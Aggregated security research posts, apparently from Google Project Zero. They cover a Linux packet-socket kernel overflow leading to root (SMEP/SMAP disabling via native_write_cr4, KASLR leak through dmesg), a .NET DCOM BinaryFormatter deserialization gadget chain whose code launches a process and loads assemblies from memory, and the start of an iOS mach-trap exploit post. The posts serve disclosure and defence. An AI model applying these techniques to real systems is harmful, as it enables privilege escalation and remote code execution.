Then, the lowest 3 bits of nxt_offset always have the value of 2 due to the alignment. That means that we can’t start overwriting at an 8-byte aligned offset.
Besides that, when a packet is being received and saved into a block, the kernel updates some fields in the block and frame headers. If we point nxt_offset to some particular offset we want to overwrite, some data where the block and frames headers end up will probably be corrupted.
Another issue is that if we make nxt_offset point past the block end, the first block will be immediately closed when the first packet is being received, since the kernel will (correctly) decide that there’s no space left in the first block (see the __packet_lookup_frame_in_block() snippet). This is not really an issue, since we can create a ring buffer with 2 blocks. The first one will be closed, the second one will be overflown.
Executing code
Now, we need to figure out which function pointers to overwrite. There are a few of function pointers fields in the packet_sock struct, but I ended up using the following two:
  1. packet_sock->xmit
  2. packet_sock->rx_ring->prb_bdqc->retire_blk_timer->func

The first one is called whenever a user tries to send a packet via a packet socket. The usual way to elevate privileges to root is to execute the commit_creds(prepare_kernel_cred(0)) payload in a process context. The xmit pointer is called from a process context, which means we can simply point it to the executable memory region, which contains the payload.
To do that we need to put our payload to some executable memory region. One of the possible ways for that is to put the payload in the userspace, either by mmapping an executable memory page or by just defining a global function within our exploit program. However, SMEP & SMAP will prevent the kernel from accessing and executing user memory directly, so we need to deal with them first.
For that I used the retire_blk_timer field (the same field used by Philip Pettersson in his CVE-2016-8655 exploit). It contains a function pointer that’s triggered whenever the retire timer times out. During normal packet socket operation, retire_blk_timer->func points to prb_retire_rx_blk_timer_expired() and it’s called with retire_blk_timer->data as an argument, which contains the address of the packet_sock struct. Since we can overwrite the data field along with the func field, we get a very nice func(data) primitive.
The state of SMEP & SMAP on the current CPU core is controlled by the 20th and 21st bits of the CR4 register. To disable them we should zero out these two bits. For this we can use the func(data) primitive to call native_write_cr4(X), where X has 20th and 21st bits set to 0. The exact value of X might depend on what other CPU features are enabled. On the machine where I tested the exploit, the value of CR4 is 0x10407f0 (only the SMEP bit is enabled since the CPU has no SMAP support), so I used X = 0x407f0. We can use the sched_setaffinity syscall to force the exploit program to be executed on one CPU core and thus making sure that the userspace payload will be executed on the same core as where we disable SMAP & SMEP.
Putting this all together, here are the exploitation steps:
  1. Figure out the kernel text address to bypass KASLR (described below).
  2. Pad heap as described above.
  3. Disable SMEP & SMAP.
    1. Allocate a packet_sock after a ring buffer block.
    2. Schedule a block retire timer on the packet_sock by attaching a receive ring buffer to it.
    3. Overflow the block and overwrite retire_blk_timer field. Make retire_blk_timer->func point to native_write_cr4 and make retire_blk_timer->data equal to the desired CR4 value.
    4. Wait for the timer to be executed, now we have SMEP & SMAP disabled on the current core.
  4. Get root privileges.
    1. Allocate another pair of a packet_sock and a ring buffer block.
    2. Overflow the block and overwrite xmit field. Make xmit point to a commit_creds(prepare_kernel_cred(0)) allocated in userspace.
    3. Send a packet on the corresponding packet socket, xmit will get triggered and the current process will obtain root privileges.

The exploit code can be found here.
It should be noted, that when we overwrite these two fields in the packet_sock structs, we’ll end up corrupting some of the fields before them (the kernel will write some values to the block and frame headers), which can lead to a kernel crash. However, as long as these other fields don’t get used by the kernel we should be good. I found that one of the fields that caused crashes if we try to close all packet sockets after the exploit finished is the mclist field, but simply zeroing it out helps.

KASLR bypass
I didn’t bother to come up with some elaborate KASLR bypass technique which exploits the same bug. Since Ubuntu doesn’t restrict dmesg by default, we can just grep the kernel syslog for the “Freeing SMP” string, which contains a kernel pointer, that looks suspiciously similar to the kernel text address:
# Boot #1$ dmesg | grep 'Freeing SMP'[    0.012520] Freeing SMP alternatives memory: 32K (ffffffffa58ee000 - ffffffffa58f6000)$ sudo cat /proc/kallsyms | grep 'T _text'ffffffffa4800000 T _text
# Boot #2$ dmesg | grep 'Freeing SMP'[    0.017487] Freeing SMP alternatives memory: 32K (ffffffff85aee000 - ffffffff85af6000)$ sudo cat /proc/kallsyms | grep 'T _text'ffffffff84a00000 T _text
By doing simple math we can calculate the kernel text address based on the one exposed through dmesg. This way of figuring out the kernel text location works only for some time after boot, as syslog only stores a fixed number of lines and starts dropping them at some point.
There are a few Linux kernel hardening features that can be used to prevent this kind of information disclosures. The first one is called dmesg_restrict and it restricts the ability of unprivileged users to read the kernel syslog. It should be noted, that even with dmesg restricted the first user on Ubuntu can still read the syslog from /var/log/kern.log and /var/log/syslog since he belongs to the adm group.
Another feature is called kptr_restrict and it doesn’t allow unprivileged users to see pointers printed by the kernel with the %pK format specifier. However in 4.8 the free_reserved_area() function uses %p, so kptr_restrict doesn’t help in this case. In 4.10 free_reserved_area() was fixed not to print address ranges at all, but the change was not backported to older kernels.
Let’s take a look at the fix. The vulnerable code as it was before the fix is below. Remember that the user fully controls both tp_block_size and tp_sizeof_priv.
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;
When thinking about a way to fix this, the first idea that comes to mind is that we can compare the two values as is without that weird conversion to int:
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     req->tp_block_size <=4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv))4210                         goto out;
Funny enough, this doesn’t actually help. The reason is that an overflow can happen while evaluating BLK_PLUS_PRIV in case tp_sizeof_priv is close to the unsigned int maximum value.
177 #define BLK_PLUS_PRIV(sz_of_priv) \178         (BLK_HDR_LEN + ALIGN((sz_of_priv), V3_ALIGNMENT))
One of the ways to fix this overflow is to cast tp_sizeof_priv to uint64 before passing it to BLK_PLUS_PRIV. That’s exactly what I did in the fix that was sent upstream.
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     req->tp_block_size <=4209                           BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv))4210                         goto out;Mitigation
Creating packet socket requires the CAP_NET_RAW privilege, which can be acquired by an unprivileged user inside a user namespaces. Unprivileged user namespaces expose a huge kernel attack surface, which resulted in quite a few exploitable vulnerabilities (CVE-2017-7184, CVE-2016-8655, ...). This kind of kernel vulnerabilities can be mitigated by completely disabling user namespaces or disallowing using them to unprivileged users.
To disable user namespaces completely you can rebuild your kernel with CONFIG_USER_NS disabled. Restricting user namespaces usage only to privileged users can be done by writing 0 to /proc/sys/kernel/unprivileged_userns_clone in Debian-based kernel. Since version 4.9 the upstream kernel has a similar /proc/sys/user/max_user_namespaces setting.Conclusion
Right now the Linux kernel has a huge number of poorly tested (from a security standpoint) interfaces and a lot of them are enabled and exposed to unprivileged users in popular Linux distributions like Ubuntu. This is obviously not good and they need to be tested or restricted.
Syzkaller is an amazing tool that allows to test kernel interfaces via fuzzing. Even adding barebone descriptions for another syscall usually uncovers numbers of bugs. We certainly need people writing syscall descriptions and fixing existing ones, since there’s a huge surface that’s still not covered and probably a ton of security bugs buried in the kernel. If you decide to contribute, we’ll be glad to see a pull request.Links
Just a bunch of related links.
Our Linux kernel bug finding tools:
A collection of Linux kernel exploitation materials:
Categories: Security

Exploiting .NET Managed DCOM

Google Project Zero - Fri, 04/28/2017 - 12:23
Posted by James Forshaw, Project Zero
One of the more interesting classes of security vulnerabilities are those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also in many cases they’re difficult for a developer to mitigate outside of not using that technology, something which isn’t always possible.
I discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET which make the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability. A Little Bit of Background KnowledgeIf you look at the history of .NET many of its early underpinnings was trying to make a better version of COM (for a quick history lesson it’s worth watching this short video of Anders Hejlsberg discussing .NET). This led to Microsoft placing a large focus on ensuring that while .NET itself might not be COM it must be able to interoperate with COM. Therefore .NET can both be used to implement as well as consume COM objects. For example instead of calling QueryInterface on a COM object you can just cast an object to a COM compatible interface. Implementing an out-of-process COM server in C# is as simple as the following:
// Define COM interface.
public interface ICustomInterface {
   void DoSomething();

// Define COM class implementing interface.
public class COMObject : ICustomInterface {
   public void DoSomething() {}

// Register COM class with COM services.
RegistrationServices reg = new RegistrationServices();
int cookie = reg.RegisterTypeForComClients(
                   | RegistrationClassContext.RemoteServer,
A client can now connect to the COM server using it’s CLSID (defined by the Guid attribute on COMClass). This is in fact so simple to do that a large number of core classes in .NET are marked as COM visible and registered for use by any COM client even those not written in .NET.

To make this all work the .NET runtime hides a large amount of boilerplate from the developer. There are a couple of mechanisms to influence this boilerplate interoperability code, such as the InterfaceType attribute which defines whether the COM interface is derived from IUnknown or IDispatch but for the most part you get what you’re given.
One thing developers perhaps don’t realize is that it’s not just the interfaces you specify which get exported from the .NET COM object but the runtime adds a number of “management” interfaces as well. This interfaces are implemented by wrapping the .NET object inside a COM Callable Wrapper (CCW).
We can enumerate what interfaces are exposed by the CCW. Taking System.Object as an example the following table shows what interfaces are supported along with how each interface is implemented, either dynamically at runtime or statically implemented inside the runtime.
Interface NameImplementation Type_ObjectDynamicIConnectionPointContainerStaticIDispatchDynamicIManagedObjectStaticIMarshalStaticIProvideClassInfoStaticISupportErrorInfoStaticIUnknownDynamic
The _Object interface refers to the COM visible representation of the System.Object class which is the root of all .NET objects, it must be generated dynamically as it’s dependent on the .NET object being exposed. On the other hand IManagedObject is implemented by the runtime itself and the implementation is shared across all CCWs.
I started looking at the exposed COM attack surface for .NET back in 2013 when I was investigating Internet Explorer sandbox escapes. One of the COM objects you could access outside the sandbox was the .NET ClickOnce Deployment broker (DFSVC) which turned out to be implemented in .NET, which is probably not too surprising. I actually found two issues, not in DFSVC itself but instead in the _Object interface exposed by all .NET COM objects. The _Object interface looks like the following (in C++).
struct _Object : public IDispatch {
 HRESULT ToString(BSTR * pRetVal);
 HRESULT GetHashCode(long *pRetVal);
 HRESULT GetType(_Type** pRetVal);
The first bug (which resulted in CVE-2014-0257) was in the GetType method. This method returns a COM object which can be used to access the .NET reflection APIs. As the returned _Type COM object was running inside the server you could call a chain of methods which resulted in getting access to the Process.Start method which you could call to escape the sandbox. If you want more details about that you can look at the PoC I wrote and put up on Github. Microsoft fixed this by preventing the access to the reflection APIs over DCOM.
The second issue was more subtle and is a byproduct of a feature of .NET interop which presumably no-one realized would be a security liability. Loading the .NET runtime requires quite a lot of additional resources, therefore the default for a native COM client calling methods on a .NET COM server is to let COM and the CCW manage the communication, even if this is a performance hit. Microsoft could have chosen to use the COM marshaler to force .NET to be loaded in the client but this seems overzealous, not even counting the possibility that the client might not even have a compatible version of .NET installed.
When .NET interops with a COM object it creates the inverse of the CCW, the Runtime Callable Wrapper (RCW). This is a .NET object which implements a runtime version of the COM interface and marshals it to the COM object. Now it’s entirely possible that the COM object is actually written in .NET, it might even be in the same Application Domain. If .NET didn’t do something you could end up with a double performance hit, marshaling in the RCW to call a COM object which is actually a CCW to a managed object.

It would be nice to try and “unwrap” the managed object from the CCW and get back a real .NET object. This is where the villain in this piece comes into play, the IManagedObject interface, which looks like the following:
struct IManagedObject : public IUnknown {
 HRESULT GetObjectIdentity(
   int*    AppDomainID,  
   int*    pCCW);
 HRESULT GetSerializedBuffer(
   BSTR *pBSTR  
When the .NET runtime gets hold of a COM object it will go through a process to determine whether it can “unwrap” the object from its CCW and avoid creating an RCW. This process is documented but in summary the runtime will do the following:
  1. Call QueryInterface on the COM object to determine if it implements the IManagedObject interface. If not then return an appropriate RCW.
  2. Call GetObjectIdentity on the interface. If the GUID matches the per-runtime GUID (generated at runtime startup) and the AppDomain ID matches the current AppDomain ID then lookup the CCW value in a runtime table and extract a pointer to the real managed object and return it.
  3. Call GetSerializedBuffer on the interface. The runtime will check if the .NET object is serializable, if so it will pass the object to BinaryFormatter::Serialize and package the result in a Binary String (BSTR). This will be returned to the client which will now attempt to deserialize the buffer to an object instance by calling BinaryFormatter::Deserialize.

Both steps 2 and 3 sound like a bad idea. For example while in 2 the per-runtime GUID can’t be guessed; if you have access to any other object in the same process (such as the COM object exposed by the server itself) you can call GetObjectIdentity on the object and replay the GUID and AppDomain ID back to the server. This doesn’t really gain you much though, the CCW value is just a number not a pointer so at best you’ll be able to extract objects which already have a CCW in place.
Instead it’s step 3 which is really nasty. Arbitrary deserialization is dangerous almost no matter what language (take your pick, Java, PHP, Ruby etc.) and .NET is no different. In fact my first ever Blackhat USA presentation (whitepaper) was on this very topic and there’s been follow up work since (such as this blog post). Clearly this is an issue we can exploit, first let’s look at it from the perspective of privilege escalation.Elevating PrivilegesHow can we get a COM server written in .NET to do the arbitrary deserialization? We need the server to try and create an RCW for a serializable .NET object exposed over COM. It would be nice if this could also been done generically; it just so happens that on the standard _Object interface there exists a function we can pass an arbitrary object to, the Equals method. The purpose of Equals is to compare two objects for equality. If we pass a .NET COM object to the server’s Equals method the runtime must try and convert it to an RCW so that the managed implementation can use it. At this point the runtime wants to be helpful and checks if it’s really a CCW wrapped .NET object. The server runtime calls GetSerializedBuffer which results in arbitrary deserialization in the server process.
This is how I exploited the ClickOnce Deployment broker a second time resulting in  CVE-2014-4073. The trick to exploiting this was to send a serialized Hashtable to the server which contains a COM implementation of the IHashCodeProvider interface. When the Hashtable runs its custom deserialization code it needs to rebuild its internal hash structures, it does that by calling IHashCodeProvider::GetHashCode on each key. By adding a Delegate object, which is serializable, as one of the keys we’ll get it passed back to the client. By writing the client in native code the automatic serialization through IManagedObject won’t occur when passing the delegate back to us. The delegate object gets stuck inside the server process but the CCW is exposed to us which we can call. Invoking the delegate results in the specified function being executed in the server context which allows us to start a new process with the server’s privileges. As this works generically I even wrote a tool to do it for any .NET COM server which you can find on github.

Microsoft could have fixed CVE-2014-4073 by changing the behavior of IManagedObject::GetSerializedBuffer but they didn’t. Instead Microsoft rewrote the broker in native code instead. Also a blog post was published warning developers of the dangers of .NET DCOM. However what they didn’t do is deprecate any of the APIs to register DCOM objects in .NET so unless a developer is particularly security savvy and happens to read a Microsoft security blog they probably don’t realize it’s a problem.
This bug class exists to this day, for example when I recently received a new work laptop I did what I always do, enumerate what OEM “value add” software has been installed and see if anything was exploitable. It turns out that as part of the audio driver package was installed a COM service written by Dolby. After a couple of minutes of inspection, basically enumerating accessible interface for the COM server, I discovered it was written in .NET (the presence of IManagedObject is always a big giveaway). I cracked out my exploitation tool and in less than 5 minutes I had code execution at local system. This has now been fixed as CVE-2017-7293, you can find the very terse writeup here. Once again as .NET DCOM is fundamentally unsafe the only thing Dolby could do was rewrite the service in native code.Hacking the CallerFinding a new instance of the IManagedObject bug class focussed my mind on its other implications. The first thing to stress is the server itself isn’t vulnerable, instead it’s only when we can force the server to act as a DCOM client calling back to the attacking application that the vulnerability can be exploited. Any .NET application which calls a DCOM object through managed COM interop should have a similar issue, not just servers. Is there likely to be any common use case for DCOM, especially in a modern Enterprise environment?
My immediate thought was Windows Management Instrumentation (WMI). Modern versions of Windows can connect to remote WMI instances using the WS-Management (WSMAN) protocol but for legacy reasons WMI still supports a DCOM transport. One use case for WMI is to scan enterprise machines for potentially malicious behavior. One of the reasons for this resurgence is  Powershell (which is implemented in .NET) having easy to use support for WMI. Perhaps PS or .NET itself will be vulnerable to this attack if they try and access a compromised workstation in the network?

Looking at MSDN, .NET supports WMI through the System.Management namespace. This has existed since the beginning of .NET. It supports remote access to WMI and considering the age of the classes it predates WSMAN and so almost certainly uses DCOM under the hood. On the PS front there’s support for WMI through cmdlets such as Get-WmiObject. PS version 3 (introduced in Windows 8 and Server 2008) added a new set of cmdlets including Get-CimInstance. Reading the related link it’s clear why the CIM cmdlets were introduced, support for WSMAN, and the link explicitly points out that the “old” WMI cmdlets uses DCOM.

At this point we could jump straight into RE of the .NET and PS class libraries, but there’s an easier way. It’s likely we’d be able to see whether the .NET client queries for IManagedObject by observing the DCOM RPC traffic to a WMI server. Wireshark already has a DCOM dissector saving us a lot of trouble. For a test I set up two VMs, one with Windows Server 2016 acting as a domain controller and one with Windows 10 as a client on the domain. Then from a Domain Administrator on the client I issued a simple WMI PS command ‘Get-WmiObject Win32_Process -ComputerName’ while monitoring the network using Wireshark. The following image shows what I observed:

The screenshot shows the initial creation request for the WMI DCOM object on the DC server ( from the PS client ( We can see it’s querying for the IWbemLoginClientID interface which is the part of the initialization process (as documented in MS-WMI). The client then tries to request a few other interfaces; notably it asks for IManagedObject. This almost certainly indicates that a client using the PS WMI cmdlets would be vulnerable.
In order to test whether this is really a vulnerability we’ll need a fake WMI server. This would seem like it would be quite a challenge, but all we need to do is modify the registration for the winmgmt service to point to our fake implementation. As long as that service then registers a COM class with the CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820} the COM activator will start the service and serve any client an instance of our fake WMI object. If we look back at our network capture it turns out that the query for IManagedObject isn’t occurring on the main class, but instead on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin. But that’s okay, it just adds a bit extra boilerplate code. To ensure it’s working we’ll implement the following code which will tell the deserialization code to look for an unknown Assembly called Badgers.
[Serializable, ComVisible(true)]
public class FakeWbemServices :
              ISerializable {
   public void GetObjectData(SerializationInfo info,
                             StreamingContext context) {
       info.AssemblyName = "Badgers, Version=";
       info.FullTypeName = "System.Badgers.Test";
   // Rest of fake implementation...
If we successfully injected a serialized stream then we’d expect the PS process to try and lookup a Badgers.dll file and using Process Monitor that’s exactly what we find.
Chaining Up the DeserializerWhen exploiting the deserialization for local privilege escalation we can be sure that we can connect back to the server and run an arbitrary delegate. We don’t have any such guarantees in the RCE case. If the WMI client has default Windows Firewall rules enabled then we almost certainly wouldn’t be able to connect to the RPC endpoint made by the delegate object. We also need to be allowed to login over the network to the machine running the WMI client, our compromised machine might not have a login to the domain or the enterprise policy might block anyone but the owner from logging in to the client machine.
We therefore need a slightly different plan, instead of actively attacking the client through exposing a new delegate object we’ll instead pass it a byte stream which when deserialized executes a desired action. In an ideal world we’d find that one serializable class which just executes arbitrary code for us. Sadly (as far as I know of) no such class exists. So instead we’ll need to find a series of “Gadget” classes which when chained together perform the desired effect.
So in this situation I tend to write some quick analysis tools, .NET supports a pretty good Reflection API so finding basic information such as whether a class is serializable or which interfaces a class supports is pretty easy to do. We also need a list of Assemblies to check, the quickest way I know of is to use the gacutil utility installed as part of the .NET SDK (and so installed with Visual Studio). Run the command gacutil /l > assemblies.txt to create a list of assembly names you can load and process. For a first pass we’ll look for any classes which are serializable and have delegates in them, these might be classes which when an operation is performed will execute arbitrary code. With our list of assemblies we can write some simple code like the following to find those classes, just call FindSerializableTypes for each assembly name string:
static bool IsDelegateType(Type t) {
 return typeof(Delegate).IsAssignableFrom(t);

static bool HasSerializedDelegate(Type t) {
 // Custom serialized objects rarely serialize their delegates.
 if (typeof(ISerializable).IsAssignableFrom(t)) {
   return false;

 foreach (FieldInfo field in FormatterServices.GetSerializableMembers(t)) {
   if (IsDelegateType(field.FieldType)) {
     return true;

static void FindSerializableTypes(string assembly_name) {
 Assembly asm = Assembly.Load(assembly_name);
 var types = asm.GetTypes().Where(t =>   t.IsSerializable
                                     &&  t.IsClass
                                     && !t.IsAbstract
                                     && !IsDelegateType(t)
                                     &&  HasSerializedDelegate(t));
 foreach (Type type in types) {
Across my system this analysis only resulted in around 20 classes, and of those many were actually in the F# libraries which are not distributed in a default installation. However one class did catch my eye, System.Collections.Generic.ComparisonComparer<T>. You can find the implementation in the reference source, but as it’s so simple here it is in its entirety:
public delegate int Comparison<T>(T x, T y);
internal class ComparisonComparer<T> : Comparer<T> {
 private readonly Comparison<T> _comparison;

 public ComparisonComparer(Comparison<T> comparison) {
   _comparison = comparison;

 public override int Compare(T x, T y) {
   return this._comparison(x, y);
This class wraps a Comparison<T> delegate which takes two generic parameters (of the same type) and returns an integer, calling the delegate to implement the IComparer<T> interface. While the class is internal its creation is exposed through Comparer<T>::Create static method. This is the first part of the chain, with this class and a bit of massaging of serialized delegates we can chain IComparer<T>::Compare to Process::Start and get an arbitrary process created. Now we need the next part of the chain, calling this comparer object with arbitrary arguments.
Comparer objects are used a lot in the generic .NET collection classes and many of these collection classes also have custom deserialization code. In this case we can abuse the SortedSet<T> class, on deserialization it rebuilds its set using an internal comparer object to determine the sort order. The values passed to the comparer are the entries in the set, which is under our complete control.  Let’s write some test code to check it works as we expect:
static void TypeConfuseDelegate(Comparison<string> comp) {
   FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
           BindingFlags.NonPublic | BindingFlags.Instance);
   object[] invoke_list = comp.GetInvocationList();
   // Modify the invocation list to add Process::Start(string, string)
   invoke_list[1] = new Func<string, string, Process>(Process.Start);
   fi.SetValue(comp, invoke_list);

// Create a simple multicast delegate.
Delegate d = new Comparison<string>(String.Compare);
Comparison<string> d = (Comparison<string>) MulticastDelegate.Combine(d, d);
// Create set with original comparer.
IComparer<string> comp = Comparer<string>.Create(d);
SortedSet<string> set = new SortedSet<string>(comp);

// Setup values to call calc.exe with a dummy argument.


// Test serialization.
BinaryFormatter fmt = new BinaryFormatter();
MemoryStream stm = new MemoryStream();
fmt.Serialize(stm, set);
stm.Position = 0;
fmt.Deserialize(stm);// Calculator should execute during Deserialize.
The only weird thing about this code is TypeConfuseDelegate. It’s a long standing issue that .NET delegates don’t always enforce their type signature, especially the return value. In this case we create a two entry multicast delegate (a delegate which will run multiple single delegates sequentially), setting one delegate to String::Compare which returns an int, and another to Process::Start which returns an instance of the Process class. This works, even when deserialized and invokes the two separate methods. It will then return the created process object as an integer, which just means it will return the pointer to the instance of the process object. So we end up with chain which looks like the following:

While this is a pretty simple chain it has a couple of problems which makes it less than ideal for our use:
  1. The Comparer<T>::Create method and the corresponding class were only introduced in .NET 4.5, which covers Windows 8 and above but not Windows 7.
  2. The exploit relies in part on a type confusion of the return value of the delegate. While it’s only converting the Process object to an integer this is somewhat less than ideal and could have unexpected side effects.
  3. Starting a process is a bit on the noisy side, it would be nicer to load our code from memory.

So we’ll need to find something better. We want something which works at a minimum on .NET 3.5, which would be the version on Windows 7 which Windows Update would automatically update you to. Also it shouldn’t rely on undefined behaviour or loading our code from outside of the DCOM channel such as over a HTTP connection. Sounds like a challenge to me.Improving the ChainWhile looking at some of the other classes which are serializable I noticed a few in the System.Workflow.ComponentModel.Serialization namespace. This namespace contains classes which are part of the Windows Workflow Foundation, which is a set of libraries to build execution pipelines to perform a series of tasks. This alone sounds interesting, and it turns out I have exploited the core functionality before as a bypass for Code Integrity in Windows Powershell.
This lead me to finding the ObjectSerializedRef class. This looks very much like a class which will deserialize any object type, not just serialized ones. If this was the case then that would be a very powerful primitive for building a more functional deserialization chain.
private sealed class ObjectSerializedRef : IObjectReference,                                           IDeserializationCallback
 private Type type;
 private object[] memberDatas;

 private object returnedObject;

 object IObjectReference.GetRealObject(StreamingContext context) {
   returnedObject = FormatterServices.GetUninitializedObject(type);
   return this.returnedObject;

 void IDeserializationCallback.OnDeserialization(object sender) {
   string[] array = null;
   MemberInfo[] serializableMembers =
      FormatterServicesNoSerializableCheck.GetSerializableMembers(           type, out array);
   FormatterServices.PopulateObjectMembers(returnedObject,                            serializableMembers, memberDatas);
Looking at the implementation the class was used as a serialization surrogate exposed through the ActivitiySurrogateSelector class. This is a feature of the .NET serialization API, you can specify a “Surrogate Selector” during the serialization process which will replace an object with surrogate class. When the stream is deserialized this surrogate class contains enough information to reconstruct the original object. One use case is to handle the serialization of non-serializable classes, but ObjectSerializedRef goes beyond a specific use case and allows you to deserialize anything. A test was in order:
// Definitely non-serializable class.
class NonSerializable {
 private string _text;

 public NonSerializable(string text) {
   _text = text;

 public override string ToString() {
   return _text;

// Custom serialization surrogate
class MySurrogateSelector : SurrogateSelector {
 public override ISerializationSurrogate GetSurrogate(Type type,
     StreamingContext context, out ISurrogateSelector selector) {
   selector = this;
   if (!type.IsSerializable) {
     Type t = Type.GetType("ActivitySurrogateSelector+ObjectSurrogate");
     return (ISerializationSurrogate)Activator.CreateInstance(t);

   return base.GetSurrogate(type, context, out selector);

static void TestObjectSerializedRef() {
   BinaryFormatter fmt = new BinaryFormatter();
   MemoryStream stm = new MemoryStream();
   fmt.SurrogateSelector = new MySurrogateSelector();
   fmt.Serialize(stm, new NonSerializable("Hello World!"));
   stm.Position = 0;

   // Should print Hello World!.
The ObjectSurrogate class seems to work almost too well. This class totally destroys any hope of securing an untrusted BinaryFormatter stream and it’s available from .NET 3.0. Any class which didn’t mark itself as serializable is now a target. It’s going to be pretty easy to find a class which while invoke an arbitrary delegate during deserialization as the developer will not be doing anything to guard against such an attack vector.
Now just to choose a target to build out our deserialization chain. I could have chosen to poke further at the Workflow classes, but the API is horrible (in fact in .NET 4 Microsoft replaced the old APIs with a new, slightly nicer one). Instead I’ll pick a really easy to use target, Language Integrated Query (LINQ).
LINQ was introduced in .NET 3.5 as a core language feature. A new SQL-like syntax was introduced to the C# and VB compilers to perform queries across enumerable objects, such as Lists or Dictionaries. An example of the syntax which filters a list of names based on length and returns the list uppercased is as follows:
string[] names = { "Alice", "Bob", "Carl" };

IEnumerable<string> query = from name in names
                           where name.Length > 3
                           orderby name
                           select name.ToUpper();

foreach (string item in query) {
You can also view LINQ not as a query syntax but instead a way of doing list comprehension in .NET. If you think of ‘select’ as equivalent to ‘map’ and ‘where’ to ‘filter’ it might make more sense. Underneath the query syntax is a series of methods implemented in the System.Linq.Enumerable class. You can write it using normal C# syntax instead of the query language; if you do the previous example becomes the following:
IEnumerable<string> query = names.Where(name => name.Length > 3)
                                .OrderBy(name => name)
                                .Select(name => name.ToUpper());
The methods such as Where take two parameters, a list object (this is hidden in the above example) and a delegate to invoke for each entry in the enumerable list. The delegate is typically provided by the application, however there’s nothing to stop you replacing the delegates with system methods. The important thing to bear in mind is that the delegates are not invoked until the list is enumerated. This means we can build an enumerable list using LINQ methods, serialize it using the ObjectSurrogate (LINQ classes are not themselves serializable) then if we can force the deserialized list to be enumerated it will execute arbitrary code.
Using LINQ as a primitive we can create a list which when enumerated maps a byte array to an instance of a type in that byte array by the following sequence:
The only tricky part is step 2, we’d like to extract a specific type but our only real option is to use the Enumerable.Join method which requires some weird kludges to get it to work. A better option would have been to use Enumerable.Zip but that was only introduced in .NET 4. So instead we’ll just get all the types in the loaded assembly and create them all, if we just have one type then this isn’t going to make any difference. How does the implementation look in C#?
static IEnumerable CreateLinq(byte[] assembly) {
 List<byte[]> base_list = new List<byte[]>();
 var get_types_del = (Func<Assembly, IEnumerable<Type>>)                         Delegate.CreateDelegate(
                          typeof(Func<Assembly, IEnumerable<Type>>),

 return base_list.Select(Assembly.Load)
The only non-obvious part of the C# implementation is the delegate for Assembly::GetTypes. What we need is a delegate which takes an Assembly object and returns a list of Type objects. However as GetTypes is an instance method the default would be to capture the Assembly class and store it inside the delegate object, which would result in a delegate which took no parameters and returned a list of Type. We can get around this by using the reflection APIs to create an open delegate to an instance member. An open delegate doesn’t store the object instance, instead it exposes it as an additional Assembly parameter, exactly what we want.
With our enumerable list we can get the assembly loaded and our own code executed, but how do we get the list enumerated to start the chain? For this decided I’d try and find a class which when calling ToString (a pretty common method) would enumerate the list. This is easy in Java, almost all the collection classes have this exact behavior. Sadly it seems .NET doesn't follow Java in this respect. So I modified my analysis tools to try and hunt for gadgets which would get us there. To cut a long story short I found a chain from ToString to IEnumerable through three separate classes. The chain looks something like the following:
Are we done yet? No, just one more step, we need to call ToString on an arbitrary object during deserialization. Of course I wouldn’t have chosen ToString if I didn’t already have a method to do this. In this final case I’ll go back to abusing poor, old, Hashtable. During deserialization of the Hashtable class it will rebuild its key set, which we already know about as this is how I exploited serialization for local EoP. If two keys are equal then the deserialization will fail with the Hashtable throwing an exception, resulting in running the following code:
throw new ArgumentException(
                                   buckets[bucketNumber].key, key));
It’s not immediately obvious why this would be useful. But perhaps looking at the implementation of GetResourceString will make it clearer:
internal static String GetResourceString(String key, params Object[] values) {
   String s = GetResourceString(key);
   return String.Format(CultureInfo.CurrentCulture, s, values);
The key is passed to GetResourceString within the values array as well as a reference to a resource string. The resource string is looked up and along with the key passed to String.Format. The resulting resource string has formatting codes so when String.Format encounters the non-string value it calls ToString on the object to format it. This results in ToString being called during deserialization kicking off the chain of events which leads to us loading an arbitrary .NET assembly from memory and executing code in the context of the WMI client.
You can see the final implementation in latest the PoC I’ve added to the issue tracker.ConclusionsMicrosoft fixed the RCE issue by ensuring that the System.Management classes never directly creates an RCW for a WMI object. However this fix doesn’t affect any other use of DCOM in .NET, so privileged .NET DCOM servers are still vulnerable and other remote DCOM applications could also be attacked.
Also this should be a lesson to never deserialize untrusted data using the .NET BinaryFormatter class. It’s a dangerous thing to do at the best of times, but it seems that the developers have abandoned any hope of making secure serializable classes. The presence of ObjectSurrogate effectively means that every class in the runtime is serializable, whether the original developer wanted them to be or not.
And as a final thought you should always be skeptical about the security implementation of middleware especially if you can’t inspect what it does. The fact that the issue with IManagedObject is designed in and hard to remove makes it very difficult to fix correctly.
Categories: Security

Exception-oriented exploitation on iOS

Google Project Zero - Tue, 04/18/2017 - 12:06
Posted by Ian Beer, Project Zero
This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing and how to build live kernel introspection features using old kernel exploits.
It’s a trap!Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:
/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),
Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel apis. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.
Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code complex mach traps often have to do lots of manual argument parsing which is tricky to get right.
